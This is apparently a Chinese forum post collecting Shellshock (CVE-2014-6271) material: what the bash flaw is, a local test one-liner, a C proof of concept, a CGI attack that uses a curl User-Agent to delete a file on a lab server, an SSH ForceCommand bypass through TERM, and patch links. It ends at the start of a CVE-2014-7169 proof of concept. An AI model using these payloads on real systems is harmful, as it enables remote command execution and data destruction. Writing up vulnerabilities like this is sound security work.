|
阅读:3158回复:0
CVE-2014-6271资料汇总
author: shawn
◆0 什么是BASH Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深 度整合的多功能接口。 ◆1 CVE-2014-6271 法国GNU/Linux爱好者Stéphane Chazelas于2014年9月中旬发现了著名的SHELL实)的一个漏洞,你可以通过构造环境变量的值来执行你想要执行的脚本代码,据报道称,这个漏洞能影响众多的运行在GNU/Linux上的会跟BASH交互的应用程序,包括: 在sshd配置中使用了ForceCommand用以限制远程用户执行命令,这个漏洞可以绕过限制去执行任何命令。一些Git和Subversion部署环境的限制Shell也会出现类似情况,OpenSSH通常用法没有问题。 OpenSSH, Apache2, php, dhcp client甚至带SUID的程序。 1,本地SHELL环境中测试是否有漏洞: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"如果存在漏洞会打印"vulnerable"。 2,C程序: #!c
-----------------------------------------------------------------------------
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
#include
#include
int main()
{ char *envp[] = { "PATH=/bin:/usr/bin", "/usr/bin/id=() { " "echo pwn me twice, shame on me; }; " "echo pwn me once, shame on you", NULL }; char *argv[] = { "/bin/bash", NULL }; execve(argv[0], argv, envp); perror("execve"); return 1;
}测试: #!bash je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c je@tiny:~$ ./bash-is-fun pwn me once, shame on you je@tiny:/home/je$ /usr/bin/id pwn me twice, shame on me 这个POC中可以看出BASH根本就没有去处理结尾,后面我们可以通过补丁来看为什么。 3,INVISIBLETHREAT上对于HTTP环境的测试: 创建一个脚本叫poc.cgi: #!bash #!/bin/bash echo "Content-type: text/html" echo "" echo '' echo '' echo '' echo 'PoC' echo '' echo '' echo '[code]' /usr/bin/env echo '' echo '' echo '' exit 0 [/code] 把脚本放入测试机后,输入: #!bash $ curl http://192.168.0.1/poc.cgi PoC [code] SERVER_SIGNATURE=Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80 HTTP_USER_AGENT=curl/7.26.0 SERVER_PORT=80 HTTP_HOST=192.168.0.1 DOCUMENT_ROOT=/var/www SCRIPT_FILENAME=/var/www/poc.cgi REQUEST_URI=/poc.cgi SCRIPT_NAME=/poc.cgi REMOTE_PORT=40974 PATH=/usr/local/bin:/usr/bin:/bin PWD=/var/www SERVER_ADMIN=webmaster@localhost HTTP_ACCEPT=*/* REMOTE_ADDR=192.168.0.1 SHLVL=1 SERVER_NAME=192.168.0.1 SERVER_SOFTWARE=Apache/2.2.22 (Debian) QUERY_STRING= SERVER_ADDR=192.168.0.1 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET _=/usr/bin/env [/code] 再来试试使用curl设置一个user-agent玩玩: #!bash
$ curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi
500 Internal Server Error
[size=1]Internal Server Error[/size]
The server encountered an internal error or
misconfiguration and was unable to complete
your request.
Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.
More information about this error may be available
in the server error log.
Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80上面已经把/var/www/target给删除了,再来看看: #!bash $ curl http://192.168.0.1/target 404 Not Found [size=1]Not Found[/size] The requested URL /target was not found on this server. Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80 这个例子当中,内容被传入 HTTP_USER_AGENT (CGI 会把HTTP头当成环境变量解析). 最终变成这样: #!bash
HTTP_USER_AGENT() { :;
};
/bin/rm /var/www/target应该只解析函数的定义,但是后面的内容仍然执行了。 4, 针对OpenSSH的POC 目前有2个攻击平面,Solar Designer给出了SSH_ORIGINAL_COMMAND的本地利用方法: seclists.org/oss-sec/2014/q3/651 还有就是针对远程利用的POC,通过利用TERM: 在机器A上生成一对RSA key pair: #!bash shawn@debian-test32:~/.ssh$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/shawn/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/shawn/.ssh/id_rsa. Your public key has been saved in /home/shawn/.ssh/id_rsa.pub. The key fingerprint is: 09:1c:92:fb:c5:68:f8:e1:b9:c2:62:a8:c7:75:5b:dc shawn@debian-test32 The key's randomart image is: +--[ RSA 2048]----+ | ... | | .o . | | ooo | | o +.o. | | = =S. | | . * o E | | o o . + | |. = o o | |oo . . | +-----------------+ 把A的公钥拷贝到机器B上: #!bash $cat /home/shawn/.ssh/authorized_keys command="/tmp/ssh.sh"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9xYHEdjbbvSO+RAtDS3u+R4sD87SUQq5OZJ+6P5n3BoOz8eKfmK2B4qQa28uGvpseFSSXIoXTKdeS3mCXevbibGG6E3RQ63U7USrh9iQupO6c45Qt+3/WOo7X3mRlZ1awUmCjurcA5Zm/yOvyMJCoRd1kpkiJljgHtMztEhWvAE4inFkqyWC81SSfsvNd/GEiyCpFw84UTdF/cH626V3V73hlxwBMd8UKI27I7ATMOcPgWsI5738tLpgPDSisvZZXZNlxAfvSgpxKYAHOQ9VsaJCG4q+Giob5iX4IDzn8gs8G7uGW+EGhzTMq83f/8ar5a5Ex8Dg9M/loYPIPp5gJ shawn@debian-test32 一个用于控制command/SSH_ORIGINAL_COMMAND的脚本 #!bash shawn@linux-ionf:~/.ssh> cat /tmp/ssh.sh #!/bin/sh case "$SSH_ORIGINAL_COMMAND" in "ps") ps -ef ;; "vmstat") vmstat 1 100 ;; "cups stop") /etc/init.d/cupsys stop ;; "cups start") /etc/init.d/cupsys start ;; *) echo "Sorry. Only these commands are available to you:" echo "ps, vmstat, cupsys stop, cupsys start" #exit 1 ;; esac 机器A上可以正常的使用限制脚本: #!bash shawn@debian-test32:~/.ssh$ export SSH_ORIGINAL_COMMAND="ps" shawn@debian-test32:~/.ssh$ ssh [email protected] $SSH_ORIGINAL_COMMAND Enter passphrase for key '/home/shawn/.ssh/id_rsa': UID PID PPID C STIME TTY TIME CMD root 1 0 0 16:47 ? 00:00:02 /sbin/init showopts root 2 0 0 16:47 ? 00:00:00 [kthreadd] root 3 2 0 16:47 ? 00:00:00 [ksoftirqd/0] 借助TERM来利用: #!bash
shawn@debian-test32:~$ export TERM='() { :;}; id'; ssh [email protected]
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
uid=1000(shawn) gid=100(users) groups=100(users)
Connection to 192.168.115.129 closed.◆2 补丁和后续 从最早GNU/Linux发行版社区收到的补丁: https://bugzilla.novell.com/attachment.cgi?id=606672 可以看出BASH的确没有做异常处理,而直接解析后就执行了。 正式的社区补丁在这里: http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017 http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018 http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039 http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012 http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048 http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025 但由于补丁修复的不完整,导致了CVE-2014-7169的爆出,POC如下: #!bash shawn@shawn-fortress /tmp $ date -u > test_file shawn@shawn-fortress /tmp $ env X='() { (a)= |
|
